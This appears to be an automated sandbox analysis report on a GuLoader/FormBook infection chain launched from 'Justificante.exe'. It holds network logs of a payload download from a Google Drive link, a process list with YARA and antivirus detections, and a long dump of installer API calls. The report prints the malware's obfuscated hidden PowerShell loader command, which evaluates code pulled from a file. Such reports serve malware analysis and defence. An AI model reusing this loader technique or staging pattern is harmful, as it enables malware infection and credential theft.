                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                        Content-Security-Policy: script-src 'nonce-cUCdgxe7Gq0IrDWtjLqnkA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                        Cross-Origin-Opener-Policy: same-origin
                        Server: ESF
                        Content-Length: 0
                        X-XSS-Protection: 0
                        X-Frame-Options: SAMEORIGIN
                        X-Content-Type-Options: nosniff
                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                        Connection: close


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        1 | 192.168.2.9 | 49715 | 142.250.186.97 | 443 | 4512 | C:\Users\user\AppData\Local\Temp\Apathism.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2024-10-22 14:04:31 UTC | 258 | OUT | GET /download?id=1YmsapsQuJkTPoH8BzP8NzbEbTh6ek1Mh&export=download HTTP/1.1
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                        Cache-Control: no-cache
                        Host: drive.usercontent.google.com
                        Connection: Keep-Alive
                        2024-10-22 14:04:34 UTC | 4899 | IN | HTTP/1.1 200 OK
                        Content-Type: application/octet-stream
                        Content-Security-Policy: sandbox
                        Content-Security-Policy: default-src 'none'
                        Content-Security-Policy: frame-ancestors 'none'
                        X-Content-Security-Policy: sandbox
                        Cross-Origin-Opener-Policy: same-origin
                        Cross-Origin-Embedder-Policy: require-corp
                        Cross-Origin-Resource-Policy: same-site
                        X-Content-Type-Options: nosniff
                        Content-Disposition: attachment; filename="sjODtFtoTrKc111.bin"
                        Access-Control-Allow-Origin: *
                        Access-Control-Allow-Credentials: false
                        Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                        Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                        Accept-Ranges: bytes
                        Content-Length: 288320
                        Last-Modified: Mon, 21 Oct 2024 07:32:30 GMT
                        X-GUploader-UploadID: AHmUCY0TXP1zVtYXuu94Ayf9g423KBXNlAMWp2YoDXfftoElbjxcR1NkCPKDgVvMUvjomn0GH47pCCx3iQ
                        Date: Tue, 22 Oct 2024 14:04:33 GMT
                        Expires: Tue, 22 Oct 2024 14:04:33 GMT
                        Cache-Control: private, max-age=0
                        X-Goog-Hash: crc32c=6iH+ig==
                        Server: UploadServer
                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                        Connection: close


                        Target ID:0
                        Start time:10:03:08
                        Start date:22/10/2024
                        Path:C:\Users\user\Desktop\Justificante.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\Desktop\Justificante.exe"
                        Imagebase:0x400000
                        File size:777'760 bytes
                        MD5 hash:73FD5954CB5BE48EA11D738097FDDA5A
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:low
                        Has exited:true

                        Target ID:2
                        Start time:10:03:14
                        Start date:22/10/2024
                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        Wow64 process (32bit):true
                        Commandline:"powershell.exe" -windowstyle hidden "$Florsukkeres=Get-Content -raw 'C:\Users\user\AppData\Local\unavailability\unmeliorated\Daredeviltry.Unw';$duncedom=$Florsukkeres.SubString(5663,3);.$duncedom($Florsukkeres)
                        Imagebase:0xa90000
                        File size:433'152 bytes
                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.2157643801.000000000D563000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                        Reputation:high
                        Has exited:true

                        Target ID:3
                        Start time:10:03:14
                        Start date:22/10/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff70f010000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:7
                        Start time:10:04:20
                        Start date:22/10/2024
                        Path:C:\Users\user\AppData\Local\Temp\Apathism.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\AppData\Local\Temp\Apathism.exe"
                        Imagebase:0x400000
                        File size:777'760 bytes
                        MD5 hash:73FD5954CB5BE48EA11D738097FDDA5A
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.2616112535.0000000021F90000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.2616112535.0000000021F90000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                        Antivirus matches:
                        • Detection: 100%, Avira
                        • Detection: 39%, ReversingLabs
                        Reputation:low
                        Has exited:true

                          Execution Graph

                          Execution Coverage:25.5%
                          Dynamic/Decrypted Code Coverage:0%
                          Signature Coverage:16.2%
                          Total number of Nodes:1411
                          Total number of Limit Nodes:40
3936->3938 3939 40599d GetWindowRect 3936->3939 3937 40580c 3940 405815 ShowWindow 3937->3940 3941 405849 GetDlgItem SendMessageW 3937->3941 3938->3932 3942 4059cb 3938->3942 3939->3938 3943 405838 3940->3943 3944 40582b ShowWindow 3940->3944 3941->3932 3945 405870 SendMessageW SendMessageW 3941->3945 3946 4059e7 SendMessageW 3942->3946 3955 4044c7 SendMessageW 3943->3955 3944->3943 3945->3932 3946->3946 3947 405a04 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3946->3947 3949 405a29 SendMessageW 3947->3949 3949->3949 3950 405a52 GlobalUnlock SetClipboardData CloseClipboard 3949->3950 3950->3932 3951->3913 3953 406579 17 API calls 3952->3953 3954 40449d SetDlgItemTextW 3953->3954 3954->3937 3955->3941 3956->3912 3958 404472 3957->3958 3959 404478 SendMessageW 3957->3959 3958->3959 3959->3915 3961 404511 GetWindowLongW 3960->3961 3962 4045bc 3960->3962 3961->3962 3963 404526 3961->3963 3962->3932 3963->3962 3964 404553 GetSysColor 3963->3964 3965 404556 3963->3965 3964->3965 3966 404566 SetBkMode 3965->3966 3967 40455c SetTextColor 3965->3967 3968 404584 3966->3968 3969 40457e GetSysColor 3966->3969 3967->3966 3970 404595 3968->3970 3971 40458b SetBkColor 3968->3971 3969->3968 3970->3962 3972 4045a8 DeleteObject 3970->3972 3973 4045af CreateBrushIndirect 3970->3973 3971->3970 3972->3973 3973->3962 4478 401563 4479 402b08 4478->4479 4482 406483 wsprintfW 4479->4482 4481 402b0d 4482->4481 4490 4026e4 4491 402d1c 17 API calls 4490->4491 4497 4026f3 4491->4497 4492 40273d ReadFile 4492->4497 4502 402830 4492->4502 4493 4060b5 ReadFile 4493->4497 4494 402832 4512 406483 wsprintfW 4494->4512 4495 40277d MultiByteToWideChar 4495->4497 4497->4492 4497->4493 4497->4494 4497->4495 4499 4027a3 SetFilePointer MultiByteToWideChar 4497->4499 4500 402843 4497->4500 4497->4502 4503 406113 SetFilePointer 4497->4503 4499->4497 4501 402864 SetFilePointer 4500->4501 4500->4502 4501->4502 4504 406147 4503->4504 4505 40612f 4503->4505 4504->4497 4506 4060b5 ReadFile 4505->4506 4507 
40613b 4506->4507 4507->4504 4508 406150 SetFilePointer 4507->4508 4509 406178 SetFilePointer 4507->4509 4508->4509 4510 40615b 4508->4510 4509->4504 4511 4060e4 WriteFile 4510->4511 4511->4504 4512->4502 4000 405b68 ShellExecuteExW 4513 401968 4514 402d1c 17 API calls 4513->4514 4515 40196f 4514->4515 4516 402d1c 17 API calls 4515->4516 4517 40197c 4516->4517 4518 402d3e 17 API calls 4517->4518 4519 401993 lstrlenW 4518->4519 4520 4019a4 4519->4520 4521 4019e5 4520->4521 4525 40653c lstrcpynW 4520->4525 4523 4019d5 4523->4521 4524 4019da lstrlenW 4523->4524 4524->4521 4525->4523 4526 40166a 4527 402d3e 17 API calls 4526->4527 4528 401670 4527->4528 4529 40689a 2 API calls 4528->4529 4530 401676 4529->4530 4011 4023ec 4012 402d3e 17 API calls 4011->4012 4013 4023fb 4012->4013 4014 402d3e 17 API calls 4013->4014 4015 402404 4014->4015 4016 402d3e 17 API calls 4015->4016 4017 40240e GetPrivateProfileStringW 4016->4017 4049 40176f 4050 402d3e 17 API calls 4049->4050 4051 401776 4050->4051 4052 401796 4051->4052 4053 40179e 4051->4053 4089 40653c lstrcpynW 4052->4089 4090 40653c lstrcpynW 4053->4090 4056 40179c 4060 4067eb 5 API calls 4056->4060 4057 4017a9 4058 405e11 3 API calls 4057->4058 4059 4017af lstrcatW 4058->4059 4059->4056 4065 4017bb 4060->4065 4061 40689a 2 API calls 4061->4065 4062 40600d 2 API calls 4062->4065 4064 4017cd CompareFileTime 4064->4065 4065->4061 4065->4062 4065->4064 4066 40188d 4065->4066 4069 40653c lstrcpynW 4065->4069 4076 406579 17 API calls 4065->4076 4083 405ba2 MessageBoxIndirectW 4065->4083 4086 401864 4065->4086 4088 406032 GetFileAttributesW CreateFileW 4065->4088 4067 4055a4 24 API calls 4066->4067 4070 401897 4067->4070 4068 4055a4 24 API calls 4074 401879 4068->4074 4069->4065 4071 403309 44 API calls 4070->4071 4072 4018aa 4071->4072 4073 4018be SetFileTime 4072->4073 4075 4018d0 CloseHandle 4072->4075 4073->4075 4077 4018e1 4075->4077 4078 402395 4075->4078 4076->4065 4079 4018e6 4077->4079 4080 4018f9 4077->4080 4078->4074 
4081 406579 17 API calls 4079->4081 4082 406579 17 API calls 4080->4082 4084 4018ee lstrcatW 4081->4084 4085 401901 4082->4085 4083->4065 4084->4085 4087 405ba2 MessageBoxIndirectW 4085->4087 4086->4068 4086->4074 4087->4078 4088->4065 4089->4056 4090->4057 4531 401a72 4532 402d1c 17 API calls 4531->4532 4533 401a7b 4532->4533 4534 402d1c 17 API calls 4533->4534 4535 401a20 4534->4535 4091 401573 4092 401583 ShowWindow 4091->4092 4093 40158c 4091->4093 4092->4093 4094 402bc2 4093->4094 4095 40159a ShowWindow 4093->4095 4095->4094 4536 4014f5 SetForegroundWindow 4537 402bc2 4536->4537 4538 401ff6 4539 402d3e 17 API calls 4538->4539 4540 401ffd 4539->4540 4541 40689a 2 API calls 4540->4541 4542 402003 4541->4542 4544 402014 4542->4544 4545 406483 wsprintfW 4542->4545 4545->4544 4100 4022f7 4101 402d3e 17 API calls 4100->4101 4102 4022fd 4101->4102 4103 402d3e 17 API calls 4102->4103 4104 402306 4103->4104 4105 402d3e 17 API calls 4104->4105 4106 40230f 4105->4106 4107 40689a 2 API calls 4106->4107 4108 402318 4107->4108 4109 402329 lstrlenW lstrlenW 4108->4109 4110 40231c 4108->4110 4112 4055a4 24 API calls 4109->4112 4111 4055a4 24 API calls 4110->4111 4114 402324 4110->4114 4111->4114 4113 402367 SHFileOperationW 4112->4113 4113->4110 4113->4114 4546 401b77 4547 402d3e 17 API calls 4546->4547 4548 401b7e 4547->4548 4549 402d1c 17 API calls 4548->4549 4550 401b87 wsprintfW 4549->4550 4551 402bc2 4550->4551 4189 40167b 4190 402d3e 17 API calls 4189->4190 4191 401682 4190->4191 4192 402d3e 17 API calls 4191->4192 4193 40168b 4192->4193 4194 402d3e 17 API calls 4193->4194 4195 401694 MoveFileW 4194->4195 4196 4016a0 4195->4196 4197 4016a7 4195->4197 4198 401423 24 API calls 4196->4198 4199 40689a 2 API calls 4197->4199 4201 4022ee 4197->4201 4198->4201 4200 4016b6 4199->4200 4200->4201 4202 406302 36 API calls 4200->4202 4202->4196 4559 40237b 4560 402382 4559->4560 4564 402395 4559->4564 4561 406579 17 API calls 4560->4561 4562 40238f 4561->4562 4563 405ba2 
MessageBoxIndirectW 4562->4563 4563->4564 4203 404eff GetDlgItem GetDlgItem 4204 404f53 7 API calls 4203->4204 4218 40517d 4203->4218 4205 404ff0 SendMessageW 4204->4205 4206 404ffd DeleteObject 4204->4206 4205->4206 4207 405008 4206->4207 4209 405017 4207->4209 4210 40503f 4207->4210 4208 405265 4214 40530e 4208->4214 4221 405170 4208->4221 4226 4052bb SendMessageW 4208->4226 4211 406579 17 API calls 4209->4211 4213 404492 18 API calls 4210->4213 4215 405021 SendMessageW SendMessageW 4211->4215 4212 405246 4212->4208 4222 405257 SendMessageW 4212->4222 4220 405053 4213->4220 4216 405323 4214->4216 4217 405317 SendMessageW 4214->4217 4215->4207 4228 405335 ImageList_Destroy 4216->4228 4229 40533c 4216->4229 4235 40534c 4216->4235 4217->4216 4218->4208 4218->4212 4219 4051de 4218->4219 4224 404e4d 5 API calls 4219->4224 4225 404492 18 API calls 4220->4225 4223 4044f9 8 API calls 4221->4223 4222->4208 4227 405511 4223->4227 4240 4051ef 4224->4240 4241 405064 4225->4241 4226->4221 4231 4052d0 SendMessageW 4226->4231 4228->4229 4233 405345 GlobalFree 4229->4233 4229->4235 4230 4054c5 4230->4221 4236 4054d7 ShowWindow GetDlgItem ShowWindow 4230->4236 4232 4052e3 4231->4232 4243 4052f4 SendMessageW 4232->4243 4233->4235 4234 40513f GetWindowLongW SetWindowLongW 4237 405158 4234->4237 4235->4230 4250 404ecd 4 API calls 4235->4250 4251 405387 4235->4251 4236->4221 4238 405175 4237->4238 4239 40515d ShowWindow 4237->4239 4259 4044c7 SendMessageW 4238->4259 4258 4044c7 SendMessageW 4239->4258 4240->4212 4241->4234 4242 4050b7 SendMessageW 4241->4242 4244 40513a 4241->4244 4248 4050f5 SendMessageW 4241->4248 4249 405109 SendMessageW 4241->4249 4242->4241 4243->4214 4244->4234 4244->4237 4245 4053cb 4252 405491 4245->4252 4257 40543f SendMessageW SendMessageW 4245->4257 4248->4241 4249->4241 4250->4251 4251->4245 4254 4053b5 SendMessageW 4251->4254 4253 40549b InvalidateRect 4252->4253 4255 4054a7 4252->4255 4253->4255 4254->4245 4255->4230 4260 404e08 4255->4260 4257->4245 
4258->4221 4259->4218 4263 404d3f 4260->4263 4262 404e1d 4262->4230 4264 404d58 4263->4264 4265 406579 17 API calls 4264->4265 4266 404dbc 4265->4266 4267 406579 17 API calls 4266->4267 4268 404dc7 4267->4268 4269 406579 17 API calls 4268->4269 4270 404ddd lstrlenW wsprintfW SetDlgItemTextW 4269->4270 4270->4262 4565 4019ff 4566 402d3e 17 API calls 4565->4566 4567 401a06 4566->4567 4568 402d3e 17 API calls 4567->4568 4569 401a0f 4568->4569 4570 401a16 lstrcmpiW 4569->4570 4571 401a28 lstrcmpW 4569->4571 4572 401a1c 4570->4572 4571->4572 4573 401000 4574 401037 BeginPaint GetClientRect 4573->4574 4575 40100c DefWindowProcW 4573->4575 4577 4010f3 4574->4577 4578 401179 4575->4578 4579 401073 CreateBrushIndirect FillRect DeleteObject 4577->4579 4580 4010fc 4577->4580 4579->4577 4581 401102 CreateFontIndirectW 4580->4581 4582 401167 EndPaint 4580->4582 4581->4582 4583 401112 6 API calls 4581->4583 4582->4578 4583->4582 4584 401d81 4585 401d94 GetDlgItem 4584->4585 4586 401d87 4584->4586 4588 401d8e 4585->4588 4587 402d1c 17 API calls 4586->4587 4587->4588 4589 401dd5 GetClientRect LoadImageW SendMessageW 4588->4589 4590 402d3e 17 API calls 4588->4590 4592 401e33 4589->4592 4594 401e3f 4589->4594 4590->4589 4593 401e38 DeleteObject 4592->4593 4592->4594 4593->4594 3459 402482 3460 402d3e 17 API calls 3459->3460 3461 402494 3460->3461 3462 402d3e 17 API calls 3461->3462 3463 40249e 3462->3463 3476 402dce 3463->3476 3466 4024d6 3470 4024e2 3466->3470 3480 402d1c 3466->3480 3467 402d3e 17 API calls 3471 4024cc lstrlenW 3467->3471 3468 402925 3469 402501 RegSetValueExW 3474 402517 RegCloseKey 3469->3474 3470->3469 3483 403309 3470->3483 3471->3466 3474->3468 3477 402de9 3476->3477 3498 4063d7 3477->3498 3481 406579 17 API calls 3480->3481 3482 402d31 3481->3482 3482->3470 3484 403334 3483->3484 3485 403318 SetFilePointer 3483->3485 3502 403411 GetTickCount 3484->3502 3485->3484 3488 4033d1 3488->3469 3489 4060b5 ReadFile 3490 403354 3489->3490 3490->3488 3491 403411 42 API 
calls 3490->3491 3492 40336b 3491->3492 3492->3488 3493 4033d7 ReadFile 3492->3493 3495 40337a 3492->3495 3493->3488 3495->3488 3496 4060b5 ReadFile 3495->3496 3497 4060e4 WriteFile 3495->3497 3496->3495 3497->3495 3499 4063e6 3498->3499 3500 4063f1 RegCreateKeyExW 3499->3500 3501 4024ae 3499->3501 3500->3501 3501->3466 3501->3467 3501->3468 3503 403569 3502->3503 3504 40343f 3502->3504 3505 402fc6 32 API calls 3503->3505 3515 403590 SetFilePointer 3504->3515 3511 40333b 3505->3511 3507 40344a SetFilePointer 3513 40346f 3507->3513 3511->3488 3511->3489 3512 4060e4 WriteFile 3512->3513 3513->3511 3513->3512 3514 40354a SetFilePointer 3513->3514 3516 40357a 3513->3516 3519 406aac 3513->3519 3526 402fc6 3513->3526 3514->3503 3515->3507 3517 4060b5 ReadFile 3516->3517 3518 40358d 3517->3518 3518->3513 3520 406ad1 3519->3520 3523 406ad9 3519->3523 3520->3513 3521 406b60 GlobalFree 3522 406b69 GlobalAlloc 3521->3522 3522->3520 3522->3523 3523->3520 3523->3521 3523->3522 3524 406be0 GlobalAlloc 3523->3524 3525 406bd7 GlobalFree 3523->3525 3524->3520 3524->3523 3525->3524 3527 402fd7 3526->3527 3528 402fef 3526->3528 3529 402fe0 DestroyWindow 3527->3529 3532 402fe7 3527->3532 3530 402ff7 3528->3530 3531 402fff GetTickCount 3528->3531 3529->3532 3541 40696d 3530->3541 3531->3532 3534 40300d 3531->3534 3532->3513 3535 403042 CreateDialogParamW ShowWindow 3534->3535 3536 403015 3534->3536 3535->3532 3536->3532 3545 402faa 3536->3545 3538 403023 wsprintfW 3539 4055a4 24 API calls 3538->3539 3540 403040 3539->3540 3540->3532 3542 40698a PeekMessageW 3541->3542 3543 406980 DispatchMessageW 3542->3543 3544 40699a 3542->3544 3543->3542 3544->3532 3546 402fb9 3545->3546 3547 402fbb MulDiv 3545->3547 3546->3547 3547->3538 3548 402902 3549 402d3e 17 API calls 3548->3549 3550 402909 FindFirstFileW 3549->3550 3551 402931 3550->3551 3554 40291c 3550->3554 3556 406483 wsprintfW 3551->3556 3553 40293a 3557 40653c lstrcpynW 3553->3557 3556->3553 3557->3554 4595 404602 lstrlenW 4596 404621 
4595->4596 4597 404623 WideCharToMultiByte 4595->4597 4596->4597 4598 401503 4599 40150b 4598->4599 4601 40151e 4598->4601 4600 402d1c 17 API calls 4599->4600 4600->4601 4602 404983 4603 4049c0 4602->4603 4604 4049af 4602->4604 4606 4049cc GetDlgItem 4603->4606 4612 404a2b 4603->4612 4663 405b86 GetDlgItemTextW 4604->4663 4609 4049e0 4606->4609 4607 404b0f 4661 404cbe 4607->4661 4665 405b86 GetDlgItemTextW 4607->4665 4608 4049ba 4610 4067eb 5 API calls 4608->4610 4611 4049f4 SetWindowTextW 4609->4611 4615 405ebc 4 API calls 4609->4615 4610->4603 4616 404492 18 API calls 4611->4616 4612->4607 4617 406579 17 API calls 4612->4617 4612->4661 4614 4044f9 8 API calls 4619 404cd2 4614->4619 4620 4049ea 4615->4620 4621 404a10 4616->4621 4622 404a9f SHBrowseForFolderW 4617->4622 4618 404b3f 4623 405f19 18 API calls 4618->4623 4620->4611 4627 405e11 3 API calls 4620->4627 4624 404492 18 API calls 4621->4624 4622->4607 4625 404ab7 CoTaskMemFree 4622->4625 4626 404b45 4623->4626 4628 404a1e 4624->4628 4629 405e11 3 API calls 4625->4629 4666 40653c lstrcpynW 4626->4666 4627->4611 4664 4044c7 SendMessageW 4628->4664 4631 404ac4 4629->4631 4634 404afb SetDlgItemTextW 4631->4634 4638 406579 17 API calls 4631->4638 4633 404a24 4636 406931 5 API calls 4633->4636 4634->4607 4635 404b5c 4637 406931 5 API calls 4635->4637 4636->4612 4644 404b63 4637->4644 4640 404ae3 lstrcmpiW 4638->4640 4639 404ba4 4667 40653c lstrcpynW 4639->4667 4640->4634 4641 404af4 lstrcatW 4640->4641 4641->4634 4643 404bab 4645 405ebc 4 API calls 4643->4645 4644->4639 4649 405e5d 2 API calls 4644->4649 4650 404bfc 4644->4650 4646 404bb1 GetDiskFreeSpaceW 4645->4646 4648 404bd5 MulDiv 4646->4648 4646->4650 4648->4650 4649->4644 4651 404c6d 4650->4651 4653 404e08 20 API calls 4650->4653 4652 404c90 4651->4652 4654 40140b 2 API calls 4651->4654 4668 4044b4 KiUserCallbackDispatcher 4652->4668 4655 404c5a 4653->4655 4654->4652 4657 404c6f SetDlgItemTextW 4655->4657 4658 404c5f 4655->4658 4657->4651 4660 404d3f 20 API 
calls 4658->4660 4659 404cac 4659->4661 4662 4048dc SendMessageW 4659->4662 4660->4651 4661->4614 4662->4661 4663->4608 4664->4633 4665->4618 4666->4635 4667->4643 4668->4659 4669 402889 4670 402890 4669->4670 4671 402b0d 4669->4671 4672 402d1c 17 API calls 4670->4672 4673 402897 4672->4673 4674 4028a6 SetFilePointer 4673->4674 4674->4671 4675 4028b6 4674->4675 4677 406483 wsprintfW 4675->4677 4677->4671 4678 40190c 4679 401943 4678->4679 4680 402d3e 17 API calls 4679->4680 4681 401948 4680->4681 4682 405c4e 67 API calls 4681->4682 4683 401951 4682->4683 4684 40190f 4685 402d3e 17 API calls 4684->4685 4686 401916 4685->4686 4687 405ba2 MessageBoxIndirectW 4686->4687 4688 40191f 4687->4688 4689 407090 4693 406adf 4689->4693 4690 40744a 4691 406b60 GlobalFree 4692 406b69 GlobalAlloc 4691->4692 4692->4690 4692->4693 4693->4690 4693->4691 4693->4692 4693->4693 4694 406be0 GlobalAlloc 4693->4694 4695 406bd7 GlobalFree 4693->4695 4694->4690 4694->4693 4695->4694 4696 401491 4697 4055a4 24 API calls 4696->4697 4698 401498 4697->4698 4706 401f12 4707 402d3e 17 API calls 4706->4707 4708 401f18 4707->4708 4709 402d3e 17 API calls 4708->4709 4710 401f21 4709->4710 4711 402d3e 17 API calls 4710->4711 4712 401f2a 4711->4712 4713 402d3e 17 API calls 4712->4713 4714 401f33 4713->4714 4715 401423 24 API calls 4714->4715 4716 401f3a 4715->4716 4723 405b68 ShellExecuteExW 4716->4723 4718 401f82 4719 4069dc 5 API calls 4718->4719 4720 402925 4718->4720 4721 401f9f CloseHandle 4719->4721 4721->4720 4723->4718 4724 402614 4725 402d3e 17 API calls 4724->4725 4726 40261b 4725->4726 4729 406032 GetFileAttributesW CreateFileW 4726->4729 4728 402627 4729->4728 3587 402596 3599 402d7e 3587->3599 3590 402d1c 17 API calls 3591 4025a9 3590->3591 3592 4025b8 3591->3592 3595 402925 3591->3595 3593 4025d1 RegEnumValueW 3592->3593 3594 4025c5 RegEnumKeyW 3592->3594 3596 4025ed RegCloseKey 3593->3596 3597 4025e6 3593->3597 3594->3596 3596->3595 3597->3596 3600 402d3e 17 API calls 3599->3600 3601 
402d95 3600->3601 3602 4063a9 RegOpenKeyExW 3601->3602 3603 4025a0 3602->3603 3603->3590 4730 401d17 4731 402d1c 17 API calls 4730->4731 4732 401d1d IsWindow 4731->4732 4733 401a20 4732->4733 3857 405518 3858 405528 3857->3858 3859 40553c 3857->3859 3860 40552e 3858->3860 3870 405585 3858->3870 3861 405564 3859->3861 3862 405544 IsWindowVisible 3859->3862 3864 4044de SendMessageW 3860->3864 3863 40558a CallWindowProcW 3861->3863 3876 404ecd 3861->3876 3865 405551 3862->3865 3862->3870 3867 405538 3863->3867 3864->3867 3871 404e4d SendMessageW 3865->3871 3870->3863 3872 404e70 GetMessagePos ScreenToClient SendMessageW 3871->3872 3873 404eac SendMessageW 3871->3873 3874 404ea9 3872->3874 3875 404ea4 3872->3875 3873->3875 3874->3873 3875->3861 3885 40653c lstrcpynW 3876->3885 3878 404ee0 3886 406483 wsprintfW 3878->3886 3880 404eea 3881 40140b 2 API calls 3880->3881 3882 404ef3 3881->3882 3887 40653c lstrcpynW 3882->3887 3884 404efa 3884->3870 3885->3878 3886->3880 3887->3884 4741 401b9b 4742 401ba8 4741->4742 4743 401bec 4741->4743 4744 401c31 4742->4744 4749 401bbf 4742->4749 4745 401bf1 4743->4745 4746 401c16 GlobalAlloc 4743->4746 4748 406579 17 API calls 4744->4748 4755 402395 4744->4755 4745->4755 4762 40653c lstrcpynW 4745->4762 4747 406579 17 API calls 4746->4747 4747->4744 4750 40238f 4748->4750 4760 40653c lstrcpynW 4749->4760 4756 405ba2 MessageBoxIndirectW 4750->4756 4752 401c03 GlobalFree 4752->4755 4754 401bce 4761 40653c lstrcpynW 4754->4761 4756->4755 4758 401bdd 4763 40653c lstrcpynW 4758->4763 4760->4754 4761->4758 4762->4752 4763->4755 4764 402b9d SendMessageW 4765 402bc2 4764->4765 4766 402bb7 InvalidateRect 4764->4766 4766->4765 4767 40149e 4768 402395 4767->4768 4769 4014ac PostQuitMessage 4767->4769 4769->4768 3894 402522 3895 402d7e 17 API calls 3894->3895 3896 40252c 3895->3896 3897 402d3e 17 API calls 3896->3897 3898 402535 3897->3898 3899 402540 RegQueryValueExW 3898->3899 3904 402925 3898->3904 3900 402560 3899->3900 3901 402566 RegCloseKey 
3899->3901 3900->3901 3905 406483 wsprintfW 3900->3905 3901->3904 3905->3901 4770 4021a2 4771 402d3e 17 API calls 4770->4771 4772 4021a9 4771->4772 4773 402d3e 17 API calls 4772->4773 4774 4021b3 4773->4774 4775 402d3e 17 API calls 4774->4775 4776 4021bd 4775->4776 4777 402d3e 17 API calls 4776->4777 4778 4021c7 4777->4778 4779 402d3e 17 API calls 4778->4779 4781 4021d1 4779->4781 4780 402210 CoCreateInstance 4785 40222f 4780->4785 4781->4780 4782 402d3e 17 API calls 4781->4782 4782->4780 4783 401423 24 API calls 4784 4022ee 4783->4784 4785->4783 4785->4784 3975 4015a3 3976 402d3e 17 API calls 3975->3976 3977 4015aa SetFileAttributesW 3976->3977 3978 4015bc 3977->3978 3979 401fa4 3980 402d3e 17 API calls 3979->3980 3981 401faa 3980->3981 3982 4055a4 24 API calls 3981->3982 3983 401fb4 3982->3983 3984 405b25 2 API calls 3983->3984 3985 401fba 3984->3985 3986 401fdd CloseHandle 3985->3986 3990 402925 3985->3990 3994 4069dc WaitForSingleObject 3985->3994 3986->3990 3989 401fcf 3991 401fd4 3989->3991 3992 401fdf 3989->3992 3999 406483 wsprintfW 3991->3999 3992->3986 3995 4069f6 3994->3995 3996 406a08 GetExitCodeProcess 3995->3996 3997 40696d 2 API calls 3995->3997 3996->3989 3998 4069fd WaitForSingleObject 3997->3998 3998->3995 3999->3986 4001 4023aa 4002 4023b2 4001->4002 4003 4023b8 4001->4003 4004 402d3e 17 API calls 4002->4004 4005 4023c6 4003->4005 4007 402d3e 17 API calls 4003->4007 4004->4003 4006 4023d4 4005->4006 4008 402d3e 17 API calls 4005->4008 4009 402d3e 17 API calls 4006->4009 4007->4005 4008->4006 4010 4023dd WritePrivateProfileStringW 4009->4010 4793 40202a 4794 402d3e 17 API calls 4793->4794 4795 402031 4794->4795 4796 406931 5 API calls 4795->4796 4797 402040 4796->4797 4798 4020c4 4797->4798 4799 40205c GlobalAlloc 4797->4799 4799->4798 4800 402070 4799->4800 4801 406931 5 API calls 4800->4801 4802 402077 4801->4802 4803 406931 5 API calls 4802->4803 4804 402081 4803->4804 4804->4798 4808 406483 wsprintfW 4804->4808 4806 4020b6 4809 406483 
